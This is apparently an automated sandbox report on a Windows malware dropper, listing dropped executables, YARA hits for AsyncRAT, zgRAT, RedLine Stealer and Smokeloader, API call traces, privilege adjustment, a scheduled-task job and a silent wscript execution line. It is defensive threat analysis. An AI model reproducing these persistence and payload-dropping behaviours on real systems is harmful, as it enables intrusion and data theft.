Code function: 19_2_0063D164 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,

19_2_0063D164

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp1486.tmp			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	File created: C:\Users\user\AppData\Local\Temp\Tmp14D5.tmp			Jump to dropped file

Spam, unwanted Advertisements and Ransom Demands

Writes many files with high entropy

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Entrepreneurs entropy: 7.99797398135	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Greatest entropy: 7.99794017652	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Provides entropy: 7.99760816884	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Competent entropy: 7.99811049854	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Whom entropy: 7.99734780297	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Reveal entropy: 7.99789640851	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Corporate entropy: 7.99704915594	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Screw entropy: 7.99717752647	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Still entropy: 7.9977069634	Jump to dropped file
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Users\user\AppData\Local\Temp\Wireless entropy: 7.9965436862	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\591950\E entropy: 7.99975204156	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\crypteda[1].exe entropy: 7.99818162851	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\Temp\1000220001\crypteda.exe entropy: 7.99818162851	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif	File created: C:\Users\user\AppData\Local\TrackGuard Technologies\z entropy: 7.99975204156	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe entropy: 7.99821613014	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	File created: C:\ProgramData\ix4A2DreBBsQwY6YHkidcDjo.exe entropy: 7.99821613014	Jump to dropped file

System Summary

Malicious sample detected (through community Yara rule)

Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE	Matched rule: Detects zgRAT Author: ditekSHen
Source: 0000001F.00000002.4168709454.0000000002A0F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 0000001F.00000002.4175235264.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED	Matched rule: Detects zgRAT Author: ditekSHen
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: C:\Users\user\Windows.exe, type: DROPPED	Matched rule: Detects AsyncRAT Author: ditekSHen

.NET source code contains very large array initializations

Source: GOLD[1].exe.11.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 311296
Source: GOLD.exe.11.dr, MoveAngles.cs	Large array initialization: MoveAngles: array initializer size 311296

PE file contains section with special chars

Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name:
Source: 36f677264b.exe.11.dr	Static PE information: section name:
Source: 36f677264b.exe.11.dr	Static PE information: section name: .idata
Source: 36f677264b.exe.11.dr	Static PE information: section name:

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Source: C:\Windows\System32\wscript.exe

COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}

Jump to behavior

Wscript called in batch mode (surpress errors)

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.js"

Source: C:\Users\user\AppData\Local\Temp\591950\Shipment.pif

Process Stats: CPU usage > 49%

Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe

Code function: 31_2_004205E7 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers,

31_2_004205E7

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00614254: CreateFileW,DeviceIoControl,CloseHandle,

19_2_00614254

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00608F2E _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,

19_2_00608F2E

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Code function: 0_2_00403899 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,ExitWindowsEx,		0_2_00403899
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00615778 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,		19_2_00615778

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Windows\ProjectionAcademy	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Windows\ChipSeems	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Windows\LaboratoriesFriend	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Windows\ConditionSuperintendent	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Windows\AyePercent	Jump to behavior
Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	File created: C:\Windows\CuDefense	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	File created: C:\Windows\Tasks\Hkbsse.job

Source: C:\Users\user\Desktop\wfJfUGeGT3.exe	Code function: 0_2_00407577	0_2_00407577
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005BB020	19_2_005BB020
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005B94E0	19_2_005B94E0
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005B9C80	19_2_005B9C80
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D23F5	19_2_005D23F5
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00638400	19_2_00638400
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005E6502	19_2_005E6502
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005E265E	19_2_005E265E
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005BE6F0	19_2_005BE6F0
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D282A	19_2_005D282A
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005E89BF	19_2_005E89BF
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005E6A74	19_2_005E6A74
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00630A3A	19_2_00630A3A
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005C0BE0	19_2_005C0BE0
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005DCD51	19_2_005DCD51
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_0060EDB2	19_2_0060EDB2
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00618E44	19_2_00618E44
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00630EB7	19_2_00630EB7
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005E6FE6	19_2_005E6FE6
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D33B7	19_2_005D33B7
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005CD45D	19_2_005CD45D
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005DF409	19_2_005DF409
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005B1663	19_2_005B1663
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005CF628	19_2_005CF628
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D16B4	19_2_005D16B4
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005BF6A0	19_2_005BF6A0
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D78C3	19_2_005D78C3
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D1BA8	19_2_005D1BA8
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005DDBA5	19_2_005DDBA5
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005E9CE5	19_2_005E9CE5
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005CDD28	19_2_005CDD28
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005DBFD6	19_2_005DBFD6
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_005D1FC0	19_2_005D1FC0
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CA8C8F	24_2_00CA8C8F
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00C96620	24_2_00C96620
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00C998E0	24_2_00C998E0
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CAA88C	24_2_00CAA88C
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00C95880	24_2_00C95880
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CC6052	24_2_00CC6052
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CC81F1	24_2_00CC81F1
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CAB9AC	24_2_00CAB9AC
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00C9CAF0	24_2_00C9CAF0
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB0B00	24_2_00CB0B00
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB7CC0	24_2_00CB7CC0
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CA4C60	24_2_00CA4C60
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CB641B	24_2_00CB641B
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CBF42E	24_2_00CBF42E
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CAC660	24_2_00CAC660
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CC1E79	24_2_00CC1E79
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CCA611	24_2_00CCA611
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00C94780	24_2_00C94780
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: 24_2_00CCA731	24_2_00CCA731
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00748C8F	27_2_00748C8F
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00736620	27_2_00736620
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00766052	27_2_00766052
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_007398E0	27_2_007398E0
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00735880	27_2_00735880
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0074A88C	27_2_0074A88C
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_007681F1	27_2_007681F1
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0074B9AC	27_2_0074B9AC
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0073CAF0	27_2_0073CAF0
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00750B00	27_2_00750B00
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00744C60	27_2_00744C60
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0075F42E	27_2_0075F42E
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0075641B	27_2_0075641B
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00757CC0	27_2_00757CC0
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00761E79	27_2_00761E79
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0074C660	27_2_0074C660
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0074AE2C	27_2_0074AE2C
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0076A611	27_2_0076A611
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_0076A731	27_2_0076A731
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: 27_2_00734780	27_2_00734780
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0040B219	31_2_0040B219
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00425054	31_2_00425054
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0044B17B	31_2_0044B17B
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0044C240	31_2_0044C240
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0044B29B	31_2_0044B29B
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_004466F0	31_2_004466F0
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00427843	31_2_00427843
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00424865	31_2_00424865
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0043B8A3	31_2_0043B8A3
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_0044AA29	31_2_0044AA29
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00404AF0	31_2_00404AF0
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00429BE5	31_2_00429BE5
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00446B88	31_2_00446B88
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00404C70	31_2_00404C70
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_00404E70	31_2_00404E70
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B152BB	31_2_02B152BB
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B3B3E2	31_2_02B3B3E2
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02AF50D7	31_2_02AF50D7
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B3C4A7	31_2_02B3C4A7
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B3B502	31_2_02B3B502
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B17AAA	31_2_02B17AAA
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B14ACC	31_2_02B14ACC
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B2BB0A	31_2_02B2BB0A
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B36957	31_2_02B36957
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02AF4ED7	31_2_02AF4ED7
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B19E4C	31_2_02B19E4C
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02B3AC90	31_2_02B3AC90
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: 31_2_02AF4D57	31_2_02AF4D57

Source: Joe Sandbox View	Dropped File: C:\ProgramData\HM3SOlbpH71yEXUIEAOeIiGX.exe AB0CA1D93238D0EFC02A41A7B311EFE3FC07C042F22D0608D33EA5313A667E55
Source: Joe Sandbox View	Dropped File: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe 6B59309AB12F1859A94FB2CE1C98639B2A538E6E098FFAC127E45C29733BD993
Source: Joe Sandbox View	Dropped File: C:\ProgramData\Microsoft Subsystem Framework\winmsbt.exe 3F074FB6A883663F2937FD9435FC90F8D31CEABE496627D40B3813DBCC472ED0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Process token adjusted: Security

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: String function: 005D8B30 appears 42 times
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: String function: 005D0D17 appears 70 times
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: String function: 005C1A36 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe	Code function: String function: 007507C0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\1000064001\kitty.exe	Code function: String function: 00CB07C0 appears 54 times
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: String function: 02B0BCB7 appears 133 times
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: String function: 02B115F9 appears 68 times
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: String function: 00421392 appears 69 times
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: String function: 02B11C37 appears 38 times
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: String function: 004219D0 appears 39 times
Source: C:\Users\user\AppData\Local\Temp\1000142101\build2.exe	Code function: String function: 0041BA50 appears 128 times

Source: channel2.exe.11.dr	Static PE information: Number of sections : 18 > 10
Source: Channel1[1].exe.11.dr	Static PE information: Number of sections : 18 > 10
Source: channel2[1].exe.11.dr	Static PE information: Number of sections : 18 > 10
Source: 3546345.exe.11.dr	Static PE information: Number of sections : 18 > 10

Source: meta[1].exe.11.dr	Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"
Source: meta.exe.11.dr	Static PE information: Resource name: RT_VERSION type: MacBinary, comment length 97, char. code 0x69, total length 1711304448, Wed Mar 28 22:22:24 2040 INVALID date, modified Tue Feb 7 01:41:58 2040, creator ' ' "4"

Source: wfJfUGeGT3.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 51.2.RegAsm.exe.482060.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 42.2.IIZS2TRqf69aZbLAX3cf3edn.exe.12df1a78.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 42.0.IIZS2TRqf69aZbLAX3cf3edn.exe.bf0000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 51.2.RegAsm.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 51.2.RegAsm.exe.482060.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: 0000001F.00000002.4168709454.0000000002A0F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 0000002A.00000002.4703878971.0000000012DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 0000001F.00000002.4175235264.0000000002AF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 0000002A.00000000.3476472138.0000000000BF2000.00000002.00000001.01000000.00000014.sdmp, type: MEMORY	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\ProgramData\IIZS2TRqf69aZbLAX3cf3edn.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\AppData\Roaming\D0nMCdvUeB.exe, type: DROPPED	Matched rule: MALWARE_Win_zgRAT author = ditekSHen, description = Detects zgRAT
Source: C:\ProgramData\YAPNXRPmcarcR4ZDgC81Tbdk.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: C:\Users\user\Windows.exe, type: DROPPED	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT

Source: GOLD[1].exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: GOLD.exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: crypteda[1].exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: crypteda.exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: build2[1].exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: build2.exe.11.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: meta[1].exe.11.dr	Static PE information: Section: .rsrc ZLIB complexity 0.9984809027777778
Source: meta.exe.11.dr	Static PE information: Section: .rsrc ZLIB complexity 0.9984809027777778
Source: random[1].exe.11.dr	Static PE information: Section: ZLIB complexity 0.9974135728882834
Source: random[1].exe.11.dr	Static PE information: Section: prspuaeb ZLIB complexity 0.9943780728545888
Source: 36f677264b.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9974135728882834
Source: 36f677264b.exe.11.dr	Static PE information: Section: prspuaeb ZLIB complexity 0.9943780728545888

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@95/66@0/13

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_0061A6AD GetLastError,FormatMessageW,

19_2_0061A6AD

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00608DE9 AdjustTokenPrivileges,CloseHandle,		19_2_00608DE9
Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr	Code function: 19_2_00609399 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		19_2_00609399

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_0061B976 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

19_2_0061B976

Source: C:\Users\user\AppData\Local\TrackGuard Technologies\GuardTrack.scr

Code function: 19_2_00614148 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,FindCloseChangeNotification,

